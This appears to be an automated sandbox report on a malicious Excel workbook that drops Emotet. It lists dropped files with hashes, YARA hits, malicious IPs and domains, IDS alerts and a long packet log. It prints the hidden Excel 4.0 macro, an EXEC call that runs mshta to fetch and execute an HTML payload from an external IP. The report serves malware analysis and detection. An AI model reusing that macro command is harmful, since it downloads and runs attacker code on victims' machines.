• Successful, ratio: 100%
• Number of executed functions: 53
• Number of non-executed functions: 197
Cookbook Comments:
• Adjust boot time
• Enable AMSI
• Found application associated with file extension: .xlsm
• Found Word or Excel or PowerPoint or XPS Viewer
• Attach to Office via COM
• Scroll down
• Close Viewer
• Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, conhost.exe
• Excluded IPs from analysis (whitelisted): 92.123.101.170, 92.123.101.210, 92.123.101.218
• Excluded domains from analysis (whitelisted): wu-shim.trafficmanager.net, ctldl.windowsupdate.com, a767.dspw65.akamai.net, download.windowsupdate.com.edgesuite.net
• Execution Graph export aborted for target mshta.exe, PID 2756 because there are no executed function
• Execution Graph export aborted for target powershell.exe, PID 3016 because it is empty
• Not all processes where analyzed, report is missing behavior information
• Report creation exceeded maximum time and may have missing disassembly code information.
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size exceeded maximum capacity and may have missing disassembly code.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
Time      Type             Description
20:39:22  API Interceptor  59x Sleep call for process: mshta.exe modified
20:39:25  API Interceptor  442x Sleep call for process: powershell.exe modified
20:39:42  API Interceptor  145x Sleep call for process: rundll32.exe modified
                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                195.154.133.20iMedPub LTD_15.xlsGet hashmaliciousBrowse
                                                  iMedPub LTD_2.xlsGet hashmaliciousBrowse
                                                    iMedPub LTD_3.xlsGet hashmaliciousBrowse
                                                      iMedPub LTD_7.xlsGet hashmaliciousBrowse
                                                        iMedPub LTD_8.xlsGet hashmaliciousBrowse
                                                          imedpub.xlsGet hashmaliciousBrowse
                                                            InnovincConf_1.xlsGet hashmaliciousBrowse
                                                              innovinc.org.xlsGet hashmaliciousBrowse
                                                                ANFg7r0v2A.dllGet hashmaliciousBrowse
                                                                  Insight Medical Publishing_10.xlsGet hashmaliciousBrowse
                                                                    Innovincconferences.xlsGet hashmaliciousBrowse
                                                                      zb.dllGet hashmaliciousBrowse
                                                                        9vn5uo9AGs0AM.dllGet hashmaliciousBrowse
                                                                          irtW.dllGet hashmaliciousBrowse
                                                                            FMPeUASgI.dllGet hashmaliciousBrowse
                                                                              Opast International.xlsGet hashmaliciousBrowse
                                                                                mfdPZSLZ.dllGet hashmaliciousBrowse
                                                                                  t7kEPEwwtqM3JO.dllGet hashmaliciousBrowse
                                                                                    iMedPub LTD.xlsGet hashmaliciousBrowse
Match | Associated Sample Name / URL | Detection | Context
weezual.fr | Ommega.xls | malicious | 213.186.33.4
mycloud.suplitecmo.com | Ommega.xls | malicious | 51.81.152.36

Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 548864
Entropy (8bit): 6.980528809006344
Encrypted: false
SSDEEP: 12288:B2AavzUBPSczbeeTLjvRyMwWd3DYr6i64/:OUBPSczbeeTnvFZDWA
MD5: 8BD62A28212A7FB5A6F44AA4E8C2A9ED
SHA1: EE143CDC53AA8D42DED5A590718748BFF889058D
SHA-256: CE03150C100640C640AC5C02B24658C61527654DCAEEFA64FFE3DF24CE92E81D
SHA-512: 1DB5553F5E4F2F9082B8933D50520F26F6AD77EA3E5FAD9ECA2C7C96A8E191D106608150C8ADC3278180FC3675EB41B35C0F0AA5AAD28C8C667E9B4A69A176B8
Malicious: true
Yara Hits:
• Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: C:\ProgramData\JooSee.dll, Author: Joe Security
Antivirus:
• Antivirus: Joe Sandbox ML, Detection: 100%

Process: C:\Windows\SysWOW64\rundll32.exe
File Type: Microsoft Cabinet archive data, 61414 bytes, 1 file
Category: dropped
Size (bytes): 61414
Entropy (8bit): 7.995245868798237
Encrypted: true
SSDEEP: 1536:EysgU6qmzixT64jYMZ8HbVPGfVDwm/xLZ9rP:wF6qmeo4eH1m9wmLvrP
MD5: ACAEDA60C79C6BCAC925EEB3653F45E0
SHA1: 2AAAE490BCDACCC6172240FF1697753B37AC5578
SHA-256: 6B0CECCF0103AFD89844761417C1D23ACC41F8AEBF3B7230765209B61EEE5658
SHA-512: FEAA6E7ED7DDA1583739B3E531AB5C562A222EE6ECD042690AE7DCFF966717C6E968469A7797265A11F6E899479AE0F3031E8CF5BEBE1492D5205E9C59690900
Malicious: false

Process: C:\Windows\SysWOW64\rundll32.exe
File Type: data
Category: dropped
Size (bytes): 328
Entropy (8bit): 3.1244568012511515
Encrypted: false
SSDEEP: 6:kKRpk8SN+SkQlPlEGYRMY9z+4KlDA3RUeYlUmlUR/t:Jp9kPlE99SNxAhUeYlUSA/t
MD5: DC338BA4CED22309E86A606DD1278B71
SHA1: 59BC123FF630D070DF07C9E4635627F34E03233A
SHA-256: 728DC32AE1D099E30D4FC5D30DC4FF9CD5D374DE403046A6AA0D2218D049D597
SHA-512: 7DCDAB0EF43D6327E98496F0739BBF1A269E6078EECC0271569E4D3EA083BEA91F6891F8FD69CE8FA46B1B107B7D5E1C6933FC9F9CC9FED1ACD0EE3C4B025FF9
Malicious: false

Process: C:\Windows\System32\mshta.exe
File Type: data
Category: downloaded
Size (bytes): 11076
Entropy (8bit): 6.175226521386573
Encrypted: false
SSDEEP: 192:aYCuCkQ5yT/yBkFwvrJ8o2bwcwJckCK5N/JR0In++uYJv1FLnb69Ree/K+HNRd:aYCPkkyT/yy0qacnkCoqJU9pnW/Kgv
MD5: E43FD46945688079796528C687495CC6
SHA1: 165FB805FF8F3470F416CBBF3D67EB1D09B5B9A2
SHA-256: A71C840B44FDCDF0C4066304B4FDC54E7E57A7F9FBA4F83D3B02739825F9B93C
SHA-512: F364A43E470442A596B137DC9C8AD3E0936D75C9C1BE29587492B5F5E7F941137D6AC96CBC12746C8139B314BBC8B8FF708F01EAB24423BC3EA484386CDDB639
Malicious: false
IE Cache URL: http://91.240.118.172/cc/vv/fe.html

Process: C:\Windows\SysWOW64\rundll32.exe
File Type: Microsoft Cabinet archive data, 61414 bytes, 1 file
Category: dropped
Size (bytes): 61414
Entropy (8bit): 7.995245868798237
Encrypted: true
SSDEEP: 1536:EysgU6qmzixT64jYMZ8HbVPGfVDwm/xLZ9rP:wF6qmeo4eH1m9wmLvrP
MD5: ACAEDA60C79C6BCAC925EEB3653F45E0
SHA1: 2AAAE490BCDACCC6172240FF1697753B37AC5578
SHA-256: 6B0CECCF0103AFD89844761417C1D23ACC41F8AEBF3B7230765209B61EEE5658
SHA-512: FEAA6E7ED7DDA1583739B3E531AB5C562A222EE6ECD042690AE7DCFF966717C6E968469A7797265A11F6E899479AE0F3031E8CF5BEBE1492D5205E9C59690900
Malicious: false

Process: C:\Windows\SysWOW64\rundll32.exe
File Type: data
Category: modified
Size (bytes): 161595
Entropy (8bit): 6.302448239972517
Encrypted: false
SSDEEP: 1536:FlYXleUpAR73k/99oFr+yQNujWNWv+1w/A/rHeGyjYPjCQarsmt6Q/GM:F+X7ARcqhQNujZv+mQjCjrsSP
MD5: D99661D0893A52A0700B8AE68457351A
SHA1: 01491FD23C4813A602D48988531EA4ABBCDF7ED9
SHA-256: BDD5111162A6FA25682E18FA74E37E676D49CAFCB5B7207E98E5256D1EF0D003
SHA-512: 6F2291CA958CBF5423CBBE570FD871C4D379A435BE692908CAAACF4C2A68BD81008254802D4F4B212165E93B126ED871A62EAF3067909EB855B29573FC325B8E
Malicious: false
                                                                                                                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                File Type:data
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):28672
                                                                                                                                Entropy (8bit):3.4042783261155494
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:768:a8rk3hbdlylKsgqopeJBWhZFGkE+cL2NdAJS6ypP3:a8rk3hbdlylKsgqopeJBWhZFGkE+cL2D
                                                                                                                                MD5:C96E48F1A43DB6DC70AA5605F71594CC
                                                                                                                                SHA1:AC619CBB44E70D7874DE9D21B8A21531E16332DB
                                                                                                                                SHA-256:99D8FE70EC2F87FA1FE76C69B6908B67A112F3ADFB091DADA1448D851327AA06
                                                                                                                                SHA-512:5C5C6857397BD5870D9DF74A178718272051A31438421513695D3F8E369B5F16C354692013393E3E0E98D983BA759207524CAD2DB47FF57832E4B71CC632E758
                                                                                                                                Malicious:false
                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                File Type:data
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):8016
                                                                                                                                Entropy (8bit):3.5854729870494317
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:96:chQCcMq+qvsqvJCwo1z8hQCcMq+qvsEHyqvJCworbzIyYbHmUVhxlUV/A2:ciHo1z8irHnorbzIwUVhqA2
                                                                                                                                MD5:CD203EFE0B1A8B1AEF2124D87E35C848
                                                                                                                                SHA1:12375A75397607E932FC651A2EC9685FB9EA9CD3
                                                                                                                                SHA-256:5D7ADEB9ECF8330A092B9745201EE03CB4710F79E016BFA22EF68B680906B9AE
                                                                                                                                SHA-512:4D8DEEDF50A6BF0BC0B0DBBD21B6E63EB90DE7F7F006090F542E27B60D1BD72D57A1CBEBCFB1DA0A99D97D8B26EE3CFC35D9ECDAC5295588F599FAAC0B0525AC
                                                                                                                                Malicious:false
                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                File Type:data
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):8016
                                                                                                                                Entropy (8bit):3.5854729870494317
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:96:chQCcMq+qvsqvJCwo1z8hQCcMq+qvsEHyqvJCworbzIyYbHmUVhxlUV/A2:ciHo1z8irHnorbzIwUVhqA2
                                                                                                                                MD5:CD203EFE0B1A8B1AEF2124D87E35C848
                                                                                                                                SHA1:12375A75397607E932FC651A2EC9685FB9EA9CD3
                                                                                                                                SHA-256:5D7ADEB9ECF8330A092B9745201EE03CB4710F79E016BFA22EF68B680906B9AE
                                                                                                                                SHA-512:4D8DEEDF50A6BF0BC0B0DBBD21B6E63EB90DE7F7F006090F542E27B60D1BD72D57A1CBEBCFB1DA0A99D97D8B26EE3CFC35D9ECDAC5295588F599FAAC0B0525AC
                                                                                                                                Malicious:false
                                                                                                                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1251, Author: xXx, Last Saved By: xXx, Name of Creating Application: Microsoft Excel, Create Time/Date: Thu Jan 27 23:12:32 2022, Last Saved Time/Date: Fri Jan 28 17:08:40 2022, Security: 0
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):92160
                                                                                                                                Entropy (8bit):6.883394588152737
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:1536:D8rk3hbdlylKsgqopeJBWhZFGkE+cL2NdAE6yHBEL70drpFk0GX/s2C6ORQYDBhi:Dgk3hbdlylKsgqopeJBWhZFGkE+cL2N+
                                                                                                                                MD5:CF9D56615629886C63B6760CBF8242ED
                                                                                                                                SHA1:543866E16DE3AEA9EB1CE485BC56ABF965FCD6F6
                                                                                                                                SHA-256:7EDBB5371754682C7ABA4F056B7CB56DBC05C0B2D1D823727E386180B065347F
                                                                                                                                SHA-512:4A76D9595AFF7B265B922C625E8E64946068F20C531CBE3101CF20CBE61EB67EA1E8911C93FE653B6EC9C1F5DFC59B855E988EC773D84E977E78E14CEFBA542E
                                                                                                                                Malicious:false
                                                                                                                                Yara Hits:
                                                                                                                                • Rule: SUSP_Excel4Macro_AutoOpen, Description: Detects Excel4 macro use with auto open / close, Source: C:\Users\user\Desktop\NZW-010122 BNUV-280122.xls, Author: John Lambert @JohnLaTwC
                                                                                                                                • Rule: JoeSecurity_XlsWithMacro4, Description: Yara detected Xls With Macro 4.0, Source: C:\Users\user\Desktop\NZW-010122 BNUV-280122.xls, Author: Joe Security
                                                                                                                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                File Type:data
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):165
                                                                                                                                Entropy (8bit):1.4377382811115937
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:3:vZ/FFDJw2fV:vBFFGS
                                                                                                                                MD5:797869BB881CFBCDAC2064F92B26E46F
                                                                                                                                SHA1:61C1B8FBF505956A77E9A79CE74EF5E281B01F4B
                                                                                                                                SHA-256:D4E4008DD7DFB936F22D9EF3CC569C6F88804715EAB8101045BA1CD0B081F185
                                                                                                                                SHA-512:1B8350E1500F969107754045EB84EA9F72B53498B1DC05911D6C7E771316C632EA750FBCE8AD3A82D664E3C65CC5251D0E4A21F750911AE5DC2FC3653E49F58D
                                                                                                                                Malicious:true
                                                                                                                                Preview:.user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):548864
                                                                                                                                Entropy (8bit):6.980528809006344
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:12288:B2AavzUBPSczbeeTLjvRyMwWd3DYr6i64/:OUBPSczbeeTnvFZDWA
                                                                                                                                MD5:8BD62A28212A7FB5A6F44AA4E8C2A9ED
                                                                                                                                SHA1:EE143CDC53AA8D42DED5A590718748BFF889058D
                                                                                                                                SHA-256:CE03150C100640C640AC5C02B24658C61527654DCAEEFA64FFE3DF24CE92E81D
                                                                                                                                SHA-512:1DB5553F5E4F2F9082B8933D50520F26F6AD77EA3E5FAD9ECA2C7C96A8E191D106608150C8ADC3278180FC3675EB41B35C0F0AA5AAD28C8C667E9B4A69A176B8
                                                                                                                                Malicious:false
                                                                                                                                File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1251, Author: xXx, Last Saved By: xXx, Name of Creating Application: Microsoft Excel, Create Time/Date: Thu Jan 27 23:12:32 2022, Last Saved Time/Date: Fri Jan 28 17:08:40 2022, Security: 0
                                                                                                                                Entropy (8bit):6.842397695869262
                                                                                                                                TrID:
                                                                                                                                • Microsoft Excel sheet (30009/1) 78.94%
                                                                                                                                • Generic OLE2 / Multistream Compound File (8008/1) 21.06%
                                                                                                                                File name:NZW-010122 BNUV-280122.xlsm
                                                                                                                                File size:92988
                                                                                                                                MD5:acbaebd7bb2090b795b481d48453b3fa
                                                                                                                                SHA1:a06b2a6d2a15d070262144854ea4ace65cb71892
                                                                                                                                SHA256:c81e4045b744f1e7aed46015f3f3a1de5078b95d908b966a56724965fb5b91e2
                                                                                                                                SHA512:b203906fe5cb2a5bddf15ec7bf7e13164819f497e56979a4a9e764015e6d747ed1a90d46be11b30805b5091c80dfb876a0f69a1dbbbbbebcbfad7e89ddd2df24
                                                                                                                                SSDEEP:1536:u8rk3hbdlylKsgqopeJBWhZFGkE+cL2NdAE6yHBEL70drpFk0GX/s2C6ORQYDBhQ:ugk3hbdlylKsgqopeJBWhZFGkE+cL2N8
                                                                                                                                Icon Hash:e4e2aa8aa4bcbcac
                                                                                                                                Document Type:OLE
                                                                                                                                Number of OLE Files:1
                                                                                                                                Has Summary Info:True
                                                                                                                                Application Name:Microsoft Excel
                                                                                                                                Encrypted Document:False
                                                                                                                                Contains Word Document Stream:False
                                                                                                                                Contains Workbook/Book Stream:True
                                                                                                                                Contains PowerPoint Document Stream:False
                                                                                                                                Contains Visio Document Stream:False
                                                                                                                                Contains ObjectPool Stream:
                                                                                                                                Flash Objects Count:
                                                                                                                                Contains VBA Macros:True
                                                                                                                                Code Page:1251
                                                                                                                                Author:xXx
                                                                                                                                Last Saved By:xXx
                                                                                                                                Create Time:2022-01-27 23:12:32
                                                                                                                                Last Saved Time:2022-01-28 17:08:40
                                                                                                                                Creating Application:Microsoft Excel
                                                                                                                                Security:0
                                                                                                                                Document Code Page:1251
                                                                                                                                Thumbnail Scaling Desired:False
                                                                                                                                Company:
                                                                                                                                Contains Dirty Links:False
                                                                                                                                Shared Document:False
                                                                                                                                Changed Hyperlinks:False
                                                                                                                                Application Version:1048576
                                                                                                                                General
                                                                                                                                Stream Path:\x5DocumentSummaryInformation
                                                                                                                                File Type:data
                                                                                                                                Stream Size:4096
                                                                                                                                Entropy:0.339840493791
                                                                                                                                Base64 Encoded:False
                                                                                                                                General
                                                                                                                                Stream Path:\x5SummaryInformation
                                                                                                                                File Type:data
                                                                                                                                Stream Size:4096
                                                                                                                                Entropy:0.259989164271
                                                                                                                                Base64 Encoded:False
                                                                                                                                General
                                                                                                                                Stream Path:Workbook
                                                                                                                                File Type:Applesoft BASIC program data, first line number 16
                                                                                                                                Stream Size:81698
                                                                                                                                Entropy:7.36680951422
                                                                                                                                Base64 Encoded:True
                                                                                                                                Name:LINKO
                                                                                                                                Type:3
                                                                                                                                Final:False
                                                                                                                                Visible:False
                                                                                                                                Protected:False
LINKO 3 False 0 False post
2,2,=EXEC("CMD.EXE /c mshta http://91.240.118.172/cc/vv/fe.html")
4,2,=HALT()
                                                                                                                                Name:LINKO
                                                                                                                                Type:3
                                                                                                                                Final:False
                                                                                                                                Visible:False
                                                                                                                                Protected:False
LINKO 3 False 0 False pre
2,2,=EXEC("CMD.EXE /c mshta http://91.240.118.172/cc/vv/fe.html")
4,2,=HALT()
Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
01/28/22-20:39:50.419922 | TCP | 2034631 | ET TROJAN Maldoc Activity (set) | 49168 | 80 | 192.168.2.22 | 91.240.118.172
01/28/22-20:39:50.609763 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49169 | 213.186.33.4 | 192.168.2.22
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                                                                Jan 28, 2022 20:39:51.535180092 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:51.535202980 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:51.535223961 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:51.535235882 CET4917080192.168.2.2251.81.152.36
                                                                                                                                Jan 28, 2022 20:39:51.535247087 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:51.535265923 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:51.535286903 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:51.535301924 CET4917080192.168.2.2251.81.152.36
                                                                                                                                Jan 28, 2022 20:39:51.535305977 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:51.535326958 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:51.535335064 CET4917080192.168.2.2251.81.152.36
                                                                                                                                Jan 28, 2022 20:39:51.535348892 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:51.535367966 CET4917080192.168.2.2251.81.152.36
                                                                                                                                Jan 28, 2022 20:39:51.535372972 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:51.535398960 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:51.535422087 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:51.535428047 CET4917080192.168.2.2251.81.152.36
                                                                                                                                Jan 28, 2022 20:39:51.535444975 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:51.535466909 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:51.535476923 CET4917080192.168.2.2251.81.152.36
                                                                                                                                Jan 28, 2022 20:39:51.535487890 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:51.535511971 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:51.535541058 CET4917080192.168.2.2251.81.152.36
                                                                                                                                Jan 28, 2022 20:39:51.535619020 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:51.535639048 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:51.535655975 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:51.535670996 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:51.535686016 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:51.535689116 CET4917080192.168.2.2251.81.152.36
                                                                                                                                Jan 28, 2022 20:39:51.535701990 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:51.535720110 CET4917080192.168.2.2251.81.152.36
                                                                                                                                Jan 28, 2022 20:39:51.535732031 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:51.535748005 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:51.535763979 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:51.535778999 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:51.535780907 CET4917080192.168.2.2251.81.152.36
                                                                                                                                Jan 28, 2022 20:39:51.535809040 CET4917080192.168.2.2251.81.152.36
                                                                                                                                Jan 28, 2022 20:39:51.535907984 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:51.535924911 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:51.535940886 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:51.535958052 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:51.535974979 CET4917080192.168.2.2251.81.152.36
                                                                                                                                Jan 28, 2022 20:39:51.536089897 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:51.536107063 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:51.536123037 CET4917080192.168.2.2251.81.152.36
                                                                                                                                Jan 28, 2022 20:39:51.536166906 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:51.536184072 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:51.536201000 CET4917080192.168.2.2251.81.152.36
                                                                                                                                Jan 28, 2022 20:39:51.697951078 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:51.697981119 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:51.697998047 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:51.698014975 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:51.698031902 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:51.698046923 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:51.698057890 CET4917080192.168.2.2251.81.152.36
                                                                                                                                Jan 28, 2022 20:39:51.698064089 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:51.698076963 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:51.698097944 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:51.698108912 CET4917080192.168.2.2251.81.152.36
                                                                                                                                Jan 28, 2022 20:39:51.698116064 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:51.698132038 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:51.698143959 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:51.698160887 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:51.698179007 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:51.698195934 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:51.698196888 CET4917080192.168.2.2251.81.152.36
                                                                                                                                Jan 28, 2022 20:39:51.698211908 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:51.698216915 CET4917080192.168.2.2251.81.152.36
                                                                                                                                Jan 28, 2022 20:39:51.698220015 CET4917080192.168.2.2251.81.152.36
                                                                                                                                Jan 28, 2022 20:39:51.698227882 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:51.698244095 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:51.698251963 CET4917080192.168.2.2251.81.152.36
                                                                                                                                Jan 28, 2022 20:39:51.698259115 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:51.698277950 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:51.698283911 CET4917080192.168.2.2251.81.152.36
                                                                                                                                Jan 28, 2022 20:39:51.698292971 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:51.698308945 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:51.698316097 CET4917080192.168.2.2251.81.152.36
                                                                                                                                Jan 28, 2022 20:39:51.698350906 CET4917080192.168.2.2251.81.152.36
                                                                                                                                Jan 28, 2022 20:39:51.698478937 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:51.698494911 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:51.698512077 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:51.698527098 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:51.698537111 CET4917080192.168.2.2251.81.152.36
                                                                                                                                Jan 28, 2022 20:39:51.698610067 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:51.698627949 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:51.698640108 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:51.698656082 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:51.698674917 CET4917080192.168.2.2251.81.152.36
                                                                                                                                Jan 28, 2022 20:39:51.698685884 CET4917080192.168.2.2251.81.152.36
                                                                                                                                Jan 28, 2022 20:39:51.698688984 CET4917080192.168.2.2251.81.152.36
                                                                                                                                Jan 28, 2022 20:39:51.698723078 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:51.698755026 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:51.698801994 CET4917080192.168.2.2251.81.152.36
                                                                                                                                Jan 28, 2022 20:39:51.698812962 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:51.698829889 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:51.698848009 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:51.698863983 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:51.698894024 CET4917080192.168.2.2251.81.152.36
                                                                                                                                Jan 28, 2022 20:39:51.698904037 CET4917080192.168.2.2251.81.152.36
                                                                                                                                Jan 28, 2022 20:39:51.698960066 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:51.698976994 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:51.698992968 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:51.699007988 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:51.699024916 CET4917080192.168.2.2251.81.152.36
                                                                                                                                Jan 28, 2022 20:39:51.699037075 CET4917080192.168.2.2251.81.152.36
                                                                                                                                Jan 28, 2022 20:39:51.699111938 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:51.699130058 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:51.699141026 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:51.699217081 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:51.699242115 CET4917080192.168.2.2251.81.152.36
                                                                                                                                Jan 28, 2022 20:39:51.699294090 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:51.699330091 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:51.699351072 CET4917080192.168.2.2251.81.152.36
                                                                                                                                Jan 28, 2022 20:39:51.699434042 CET4917080192.168.2.2251.81.152.36
                                                                                                                                Jan 28, 2022 20:39:51.860639095 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:51.860694885 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:51.860718012 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:51.860738993 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:51.860763073 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:51.860784054 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:51.860796928 CET4917080192.168.2.2251.81.152.36
                                                                                                                                Jan 28, 2022 20:39:51.860805988 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:51.860822916 CET4917080192.168.2.2251.81.152.36
                                                                                                                                Jan 28, 2022 20:39:51.860827923 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:51.860846043 CET4917080192.168.2.2251.81.152.36
